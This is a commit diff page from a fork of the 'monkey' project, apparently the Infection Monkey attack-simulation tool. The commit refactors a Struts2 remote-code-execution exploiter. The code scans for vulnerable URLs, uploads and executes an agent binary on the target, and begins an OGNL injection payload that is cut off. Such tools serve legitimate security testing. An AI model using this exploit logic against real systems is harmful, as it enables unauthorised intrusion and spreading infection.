p34709852
/
monkey
forked from p15670423/monkey
1
0
Fork 1
Code Issues Pull Requests Projects Releases Wiki Activity

Struts2 refactored for framework fixes

This commit is contained in:
Vakaris 2018-08-10 15:04:23 +03:00
parent 8d7221eada
commit beb8dfed92
1 changed files with 11 additions and 15 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
infection_monkey/exploit/struts2.py
View File

@ -26,45 +26,39 @@ class Struts2Exploiter(WebRCE):
super(Struts2Exploiter, self).__init__(host) super(Struts2Exploiter, self).__init__(host)
def exploit_host(self): def exploit_host(self):
# We need a reference to the exploiter for WebRCE framework to use
exploiter = self.exploit
# Get open ports # Get open ports
ports = WebRCE.get_ports_w(self.host, self.HTTP, ["http"]) ports = self.get_ports_w(self.HTTP, ["http"])
if not ports: if not ports:
return False return False
# Get urls to try to exploit # Get urls to try to exploit
urls = WebRCE.build_potential_urls(self.host, ports) urls = self.build_potential_urls(ports)
vulnerable_urls = [] vulnerable_urls = []
for url in urls: for url in urls:
# Get full URL # Get full URL
url = self.get_redirected(url) url = self.get_redirected(url)
if WebRCE.check_if_exploitable(exploiter, url): if self.check_if_exploitable(url):
vulnerable_urls.append(url) vulnerable_urls.append(url)
self._exploit_info['vulnerable_urls'] = vulnerable_urls self._exploit_info['vulnerable_urls'] = vulnerable_urls
if not vulnerable_urls: if not vulnerable_urls:
return False return False
# We need to escape backslashes for our exploiter
config = copy.deepcopy(self._config)
config.dropper_target_path_win_32 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_32)
config.dropper_target_path_win_64 = re.sub(r"\\", r"\\\\", config.dropper_target_path_win_64)
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config): if self.skip_exist and self.check_remote_files(vulnerable_urls[0]):
LOG.info("Host %s was already infected under the current configuration, done" % self.host) LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True return True
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): if not self.set_host_arch(vulnerable_urls[0]):
return False return False
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0]) data = self.upload_monkey(vulnerable_urls[0])
# We can't use 'if not' because response may be '' # We can't use 'if not' because response may be ''
if data is not False and data['response'] == False: if data is not False and data['response'] is False:
return False return False
if WebRCE.change_permissions(self.host, vulnerable_urls[0], exploiter, data['path']) == False: if self.change_permissions(vulnerable_urls[0], data['path']) is False:
return False return False
if WebRCE.execute_remote_monkey(self.host, vulnerable_urls[0], exploiter, data['path'], True) == False: if self.execute_remote_monkey(vulnerable_urls[0], data['path'], True) is False:
return False return False
return True return True
@ -86,6 +80,8 @@ class Struts2Exploiter(WebRCE):
:param cmd: Code to try and execute on host :param cmd: Code to try and execute on host
:return: response :return: response
""" """
cmd = re.sub(r"\\", r"\\\\", cmd)
cmd = re.sub(r"'", r"\\'", cmd)
payload = "%%{(#_='multipart/form-data')." \ payload = "%%{(#_='multipart/form-data')." \
"(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \
"(#_memberAccess?" \ "(#_memberAccess?" \